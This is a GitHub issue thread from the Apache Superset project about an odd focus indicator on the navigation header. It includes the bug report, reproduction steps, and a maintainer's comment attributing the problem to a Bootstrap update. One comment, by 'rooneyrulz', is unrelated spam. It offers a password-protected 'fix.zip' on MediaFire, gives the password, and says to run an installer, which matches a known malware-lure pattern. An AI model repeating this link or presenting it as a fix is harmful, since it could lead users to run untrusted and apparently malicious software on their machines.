### ISSUE TITLE
Weird focus indicator on navigation header

### ISSUE THREAD

**Issue by michael-s-molina** [apache/superset#30054]
### Bug description

Superset is showing a weird focus indicator on the navigation header. I'm not sure if this was intended for accessibility but it gets activated only if you click on the Superset logo. If you click on Dashboard, it will not activate the focus.

### How to reproduce the bug

1. Click on the Superset logo
2. Use tab to navigate to other menu option
3. Check that if you click on Dashboard the focus is not activated

### Screenshots/recordings

https://github.com/user-attachments/assets/1759c9bf-c4f1-4527-be4c-2201f403eb77

### Superset version

master / latest-dev

### Python version

3.9

### Node version

16

### Browser

Chrome

### Additional context

Also present in 4.1.0 RC2

### Checklist

- [X] I have searched Superset docs and Slack and didn't find a solution to my problem.
- [X] I have searched the GitHub issue tracker and didn't find a similar bug report.
- [X] I have checked Superset's logs for errors and if I found a relevant Python stacktrace, I included it here as text in the "additional context" section.

**Comment by rooneyrulz** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rusackas** [comment]
Looks like it's coming from bootstrap, which got bumped recently. I reckon I can fix this pretty quick (famous last words).
